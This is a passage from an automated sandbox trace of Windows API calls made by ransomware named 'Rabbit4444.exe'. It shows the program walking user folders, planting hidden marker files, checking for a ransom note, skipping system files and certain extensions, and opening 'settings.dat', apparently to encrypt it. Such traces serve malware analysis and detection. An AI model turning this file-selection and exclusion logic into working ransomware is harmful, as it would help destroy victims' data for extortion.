lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.221] FlushFileBuffers (hFile=0x298) returned 1 [0063.222] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.222] CloseHandle (hObject=0x298) returned 1 [0063.222] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\TempState") returned 85 [0063.222] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.222] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9645a4f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1a14e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef0113a8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102850 [0063.223] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.223] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.223] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.223] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.223] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9645a4f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1a14e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef0113a8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.223] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.223] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.223] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.223] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.223] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.223] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef0113a8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef0113a8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef0113a8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.223] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.223] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.223] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef0113a8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef0113a8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef0113a8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.223] FindClose (in: hFindFile=0x102850 | out: hFindFile=0x102850) returned 1 [0063.223] lstrcpyW (in: lpString1=0x130ebe4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.223] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.223] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.224] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.224] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.224] CloseHandle (hObject=0x278) returned 1 [0063.224] CloseHandle (hObject=0x298) returned 1 [0063.224] GetCurrentThreadId () returned 0xd98 [0063.224] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1221a8 [0063.224] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\SystemAppData" [0063.224] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123140 | out: hHeap=0xe0000) returned 1 [0063.224] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221a0 | out: hHeap=0xe0000) returned 1 [0063.224] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\SystemAppData" [0063.224] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\SystemAppData\\" [0063.224] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0063.224] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.228] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.230] FlushFileBuffers (hFile=0x298) returned 1 [0063.231] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.231] CloseHandle (hObject=0x298) returned 1 [0063.231] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\SystemAppData") returned 89 [0063.231] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.231] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb907b89d, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xb907b89d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xef0113a8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0063.232] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.232] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.232] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.232] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.232] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb907b89d, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xb907b89d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xef0113a8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.232] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.232] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.232] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.232] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.232] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.232] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef0113a8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef0113a8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef037781, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.232] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.232] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.232] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef0113a8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef0113a8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef037781, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.232] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0063.232] lstrcpyW (in: lpString1=0x130ebec, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.232] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.233] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.233] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.233] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.233] CloseHandle (hObject=0x278) returned 1 [0063.233] CloseHandle (hObject=0x298) returned 1 [0063.233] GetCurrentThreadId () returned 0xd98 [0063.233] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122008 [0063.233] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings" [0063.234] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124758 | out: hHeap=0xe0000) returned 1 [0063.234] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122000 | out: hHeap=0xe0000) returned 1 [0063.234] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings" [0063.234] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\" [0063.234] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" [0063.234] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.237] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.239] FlushFileBuffers (hFile=0x298) returned 1 [0063.240] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.240] CloseHandle (hObject=0x298) returned 1 [0063.241] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings") returned 84 [0063.241] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.241] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9645a4f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x7136507a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xef037781, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0063.241] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.241] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.241] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.241] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.241] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9645a4f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x7136507a, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xef037781, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.242] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.242] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.242] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.242] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.242] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.242] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef037781, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef037781, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef037781, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.242] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.242] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.242] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9704670, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x9704670, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x9704670, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0063.242] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.242] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.242] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0063.242] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0063.242] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0063.242] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0063.242] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0063.242] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0063.242] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0063.242] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0063.242] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0063.242] lstrcpyW (in: lpString1=0x130ebe2, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0063.242] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0063.243] lstrlenW (lpString="roaming.lock") returned 12 [0063.243] lstrlenW (lpString="Rabbit4444") returned 10 [0063.243] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0063.243] lstrlenW (lpString=".dll") returned 4 [0063.243] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0063.243] lstrlenW (lpString=".lnk") returned 4 [0063.243] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0063.243] lstrlenW (lpString=".ini") returned 4 [0063.243] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0063.243] lstrlenW (lpString=".sys") returned 4 [0063.243] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0063.243] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9645a4f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xb907b89d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0063.243] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.243] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.243] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0063.243] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0063.243] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0063.243] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0063.243] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0063.243] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0063.243] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0063.243] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0063.243] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0063.243] lstrcpyW (in: lpString1=0x130ebe2, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0063.243] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0063.244] lstrlenW (lpString="settings.dat") returned 12 [0063.244] lstrlenW (lpString="Rabbit4444") returned 10 [0063.244] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0063.244] lstrlenW (lpString=".dll") returned 4 [0063.244] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0063.244] lstrlenW (lpString=".lnk") returned 4 [0063.245] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0063.245] lstrlenW (lpString=".ini") returned 4 [0063.245] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0063.245] lstrlenW (lpString=".sys") returned 4 [0063.245] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0063.245] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0063.245] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0063.245] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15455577132) returned 1 [0063.245] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0063.245] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0063.245] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0063.245] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x2a0 [0063.246] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0063.248] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e2c0 [0063.248] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0063.249] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e2c0 | out: hHeap=0xe0000) returned 1 [0063.249] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0063.249] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x123760 [0063.249] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0063.249] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0063.249] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0063.249] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15455970134) returned 1 [0063.249] 